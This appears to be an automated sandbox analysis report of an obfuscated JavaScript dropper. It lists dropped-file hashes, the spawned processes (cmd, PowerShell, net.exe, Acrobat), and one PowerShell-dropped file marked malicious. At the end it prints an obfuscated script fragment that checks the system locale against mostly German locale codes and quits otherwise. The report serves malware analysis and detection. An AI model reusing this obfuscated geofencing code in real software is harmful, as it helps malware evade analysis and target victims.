SSDEEP: | 24:Yv6X53UmCamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSb:Yvm5cBgkDMUJUAh8cvMb |
MD5: | C302461EEAE0CA39CEBC6DEAD4707BE9 |
SHA1: | 91C59638C10041EAA939D0DF631A3BD61AB16563 |
SHA-256: | 0667AB4245BB92E538E89015137C4640AE79EC3379FD5FAFE1578E83A44F91BC |
SHA-512: | 77EAE63DB1A9911FF3E8C0AE6FE11BA5E192D6907AEDA71E8FE7630BE422821C488AC400889E9DC8F1B29ABDFB41957287B8E37EE698546CD0775BF29B358E50 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.261770995792464 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJfshHHrPeUkwRe9:YvXKX53vcm5GUUUkee9 |
MD5: | C1CE96B26BF6B9335B534F6505B3C5F0 |
SHA1: | 48C783BCEE1E83159538B47CC284386B7F67CC9F |
SHA-256: | E5BDE239C162B15A81AEFCBB43BF1D64E09CD62286B96B7F55417725E1FD689A |
SHA-512: | 778FEF99FEB8CACC9377F9EA271C818D6D66C24C86195DFE9F8550A33F7217AAD54FF3D41BAF1B0256820F8012C468E4296787A1FBC27994E67012E13ABA6600 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.261783061601405 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX5R8s9nKGnZiQ0YcSKoAvJTqgFCrPeUkwRe9:YvXKX53vcm5GTq16Ukee9 |
MD5: | CCE19630C86D779659B79EAC59B49389 |
SHA1: | EE12FB233180441796A0D285B91E74C3D17D928A |
SHA-256: | 75EEF469BFF4689EE8D184D4521B413057C6EDFED97501F933A70CEEB118BF42 |
SHA-512: | E7D67DAE391DE0B1DFA32B920D521CBA99A35DAF9D0170EFA0CEAC7C6D2B568D0D2F35B6B7A697A498E54ECAC4F5B4152AAF4F71BCC1AEB66D9F8B224BBBA722 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.140872448136378 |
Encrypted: | false |
SSDEEP: | 24:Y6CBX8B1WGaeLaytBuykIdoEVJzh+DJOW1bWRJPjv7z2j0SjfOCKC2rQSY2LSjRS:YXhQ9NyoJz5/IeoJSYX18eTcZ469+sb |
MD5: | FF53AD0547E13E66A98DFEBF201FA0FD |
SHA1: | 931752D2227FC7DA0C5AF31004E934C86893D334 |
SHA-256: | 69BA1A5CA4E4E5D5D3215FB883D9DEDCD3E7B6AEB70633582F59A216AF5B8183 |
SHA-512: | 861A3101266DEF6CEE1021DC8D3E9E5BA011A5F5E38400C7E5BB1394F9FC595632754157212980D2034CCDE52440333000945688F50470A878A822EE1E0A0D78 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1465840929751152 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7ursGxRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudc7:TFl2GL7msaXc+XcGNFlRYIX2v3kb |
MD5: | 709B0FBADB4FC99C1D59CF6FB89A05E1 |
SHA1: | 7D1F6E8D4074B3714A1D79F0DFAA7D49E0208173 |
SHA-256: | E0B7453C89BCF4C83B89CAD6791B0AB1E5F961E224CA4A0235539995F312A81D |
SHA-512: | 6EAB9CC98BB179CBB421D74F796271B394AFFA5EF70E414D5DA57C7CEA43FA6A46A153C8371F2A8E442D88803E0B0883EA53993BD2E4DA227A5800B47A535D6D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.5505982318461984 |
Encrypted: | false |
SSDEEP: | 24:7+t8xUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLux2qLxx/XYKu:7MnXc+XcGNFlRYIX2vTqVl2GL7ms2n |
MD5: | A9E6E5EE583C112B16ACCE08390A094B |
SHA1: | 5BB816EA7069E754CF3524D31AC242C564C05348 |
SHA-256: | 4B3D735A09F0A2D6B7B178229E0A720ABACE7B30B50C41B054943BB4844E7D85 |
SHA-512: | 78E2D05FCDF40A4DAE29493F9FBBD4591BFA80F422008A87B99D2A17B53B4629289D0D7F1DC9598E6B21AB3D0ECB1057401D54E3822317D748D608F53AEC6922 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgGjB1g0BP9LYslGuTMpltw9rA24yABYyu:6a6TZ44ADEiBa0P9LN4u/6jBK |
MD5: | B52F3F6BF947F0E1EA9B0B60F1929E7C |
SHA1: | DAECDE52F4A21DFF08CA2D1F366F3C2ED5FCB1E9 |
SHA-256: | 5618DA31EF12C1CB8D18F8FCA33CA6AA039642D40FA40316170BBCD5975837B6 |
SHA-512: | CC52115EF3C2DDACDD5303253681443098CFFA7BF98BC0717C2A7F62D90786BB57AA37A85515E4C44E9B195FAED00285B564451FC6C62E16C662EE36A3192471 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1510207563435464 |
Encrypted: | false |
SSDEEP: | 3:Nlllullkv/tz:NllU+v/ |
MD5: | 6442F277E58B3984BA5EEE0C15C0C6AD |
SHA1: | 5343ADC2E7F102EC8FB6A101508730898CB14F57 |
SHA-256: | 36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D |
SHA-512: | F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.474031179946553 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClEaEYlYH:Qw946cPbiOxDlbYnuRK+bDTYlYH |
MD5: | 02C266B0E62378575938F2B5D5C73C33 |
SHA1: | 9827DDEA48305AE937C12010E4AF70FB54D5D1DE |
SHA-256: | AEE70B4F7BCD06A6A72FF98959FEFF9B12AE0C57287D3068792F93A7A2AC25BE |
SHA-512: | EDCBFC9EB92FC3F7939187D2BDA51A5CE6CE99C6D888334CAB52129C69F0296BC2C6E69138DB9948D0C1476E6FA664A2A6D84467C0A6EF7F031499881E996D0E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 17-11-03-533.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.310092528688388 |
Encrypted: | false |
SSDEEP: | 384:YgUgQgpnInknVnmxn5n2nWnnnxnU2gy2H2rVPVRkfkpksk8kfk4k+PT9TlT7TPbW:YVXsIkVmx52WnxUTy2cFvWKjPstjpZ3O |
MD5: | 6467DD2444F7FB52A5C6E964EC5D48FB |
SHA1: | 441ED7735D75A44A86FE2ADA4E1CD1E3D69C9E33 |
SHA-256: | 4A3B2DB5D3336EA5848EE2AF4E26D335CC8FD18A9AB6B7F7C6E716FD2FFCFFF3 |
SHA-512: | 54924F65D9A823209F96D325F991FE4A50077DCB55DC113F6776BFAC44578BADFE7C0C6DDA31D9B687F75B7476BE9203041748CC8FCC45FC664457605F0B008E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.394687593055256 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbf2cboI82cbR:V3fOCIdJDehR81 |
MD5: | 426E4129BF255D21056D321308689418 |
SHA1: | CFCA28636EB97FDEB82BB81D454B15B7E95662E0 |
SHA-256: | 09905542C32C4F3FFBF73499EBF40BA85F51A29B463891F9F0E4A5C97C8E69D0 |
SHA-512: | C6DB81B358C8127A59F1B8DB4B0AF6337C5A809A291D331575F3EF1450793989E6AA4D360EC974E4A0AB89503E9FEADD20E11AFA6E533CF26B47B62EAAFF7980 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje |
MD5: | 716C2C392DCD15C95BBD760EEBABFCD0 |
SHA1: | 4B4CE9C6AED6A7F809236B2DAFA9987CA886E603 |
SHA-256: | DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8 |
SHA-512: | E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/v5eYIGNPpeWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:X5eZGeWLxBGZN3mlind9i4ufFXpAXkru |
MD5: | 0577D5115207C63BC12C87152DA37790 |
SHA1: | ED064A52598DC5F61E1727A229DA749F5E26D712 |
SHA-256: | D855115EE5A713EC7186CDFA6B19B62531D14FC02DD56C32784860CEABF51666 |
SHA-512: | E067F1B48F2D44224BC9F0BFBDE619700A24B6AFA94961BF2555B0FD7DE3A2DFB68344C5C0EA1CC7D07918D909E0E6A2842F8C295E808C460CB34DA609366AD0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.887865604729608 |
TrID: | |
File name: | 14174249761820017751.js |
File size: | 20'798 bytes |
MD5: | 8f306d7b5dc1c7ee06bdf24fcad79bac |
SHA1: | 486ef322ee975b238c44d7919b085790aead7922 |
SHA256: | fbb3ee71293eb67b2f1458b006f4a88be3a4a3086d003c1e33563d53b52fc3cf |
SHA512: | 362484aee50c2c7d66268b50a5869899a1b6c8fa0b6cd63f9fa175671c5725ac31228c8b0380a0fa96bf4f593ec0c82967691b759e3f49122523f8764371f542 |
SSDEEP: | 384:F2M/UgcljJyygTgndTroa2WQ2F25m/4wLtPd0SblxYB8TFva77l38Qutu4SbAhz6:F2M8gAJY4Troa2WQ2F25m/4wRPd0Sbl0 |
TLSH: | 909232E68601CEDB4CD508E5A27210E60BE781EA0CD3996D4C92E1395E7E462FDF48FD |
File Content Preview: | function ronebt(){kgvfh=[1031,3079,5127,4103,2055,3072];var nfwmod=this[rnpgvay+hdjlp+axlhw+ajaivkcy+rbkvsq+cwfyi+simkc+ndiimmiq](this[jtwknri+wawsm+cbwrhhz+axlhw+ypzvpb+rnpgvay+ndiimmiq][nvhxhjhs+axlhw+rbkvsq+hdjlp+ndiimmiq+rbkvsq+ijjlh+ffizymnt+iefnk+rb |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 17:10:51 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff60c610000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 17:10:52 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff657cf0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 17:10:52 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 17:10:53 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 17:11:00 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 17:11:00 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff657cf0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 17:11:00 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff69c0f0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 17:11:00 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 17:11:01 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 17:11:01 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function ronebt() { |
|
1 | kgvfh = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var nfwmod = this[rnpgvay + hdjlp + axlhw + ajaivkcy + rbkvsq + cwfyi + simkc + ndiimmiq] ( this[jtwknri + wawsm + cbwrhhz + axlhw + ypzvpb + rnpgvay + ndiimmiq][nvhxhjhs + axlhw + rbkvsq + hdjlp + ndiimmiq + rbkvsq + ijjlh + ffizymnt + iefnk + rbkvsq + cbwrhhz + ndiimmiq] ( jtwknri + wawsm + cbwrhhz + axlhw + ypzvpb + rnpgvay + ndiimmiq + lscayqll + wawsm + mltoaixa + rbkvsq + iifnqus + iifnqus ) [ueyum + rbkvsq + zrdnmngr + ueyum + rbkvsq + hdjlp + zaoqidyt] ( ziqhjpke + mtlhis + lmikozd + rzynou + wznbjfndd + nvhxhjhs + nniwg + ueyum + ueyum + lmikozd + fqnhbjg + zntfoq + wznbjfndd + nniwg + wawsm + lmikozd + ueyum + lnhzyofo + nvhxhjhs + vsjlcby + simkc + ndiimmiq + axlhw + vsjlcby + iifnqus + meenlr + gqpszrxdw + hdjlp + simkc + rbkvsq + iifnqus + lnhzyofo + cwfyi + simkc + ndiimmiq + rbkvsq + axlhw + simkc + hdjlp + ndiimmiq + ypzvpb + vsjlcby + simkc + hdjlp + iifnqus + lnhzyofo + mwqoztc + vsjlcby + cbwrhhz + hdjlp + iifnqus + rbkvsq ), 16 ); |
|
3 | for ( fykkeuw = 0 ; fykkeuw < kgvfh[iifnqus + rbkvsq + simkc + zrdnmngr + ndiimmiq + mltoaixa] ; ++ fykkeuw ) | |
4 | { | |
5 | if ( nfwmod == kgvfh[fykkeuw] ) | |
6 | { | |
7 | nfwmod = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( nfwmod !== true ) | |
12 | this[jtwknri + wawsm + cbwrhhz + axlhw + ypzvpb + rnpgvay + ndiimmiq][elcfwr + kerwi + ypzvpb + ndiimmiq] ( ); | |
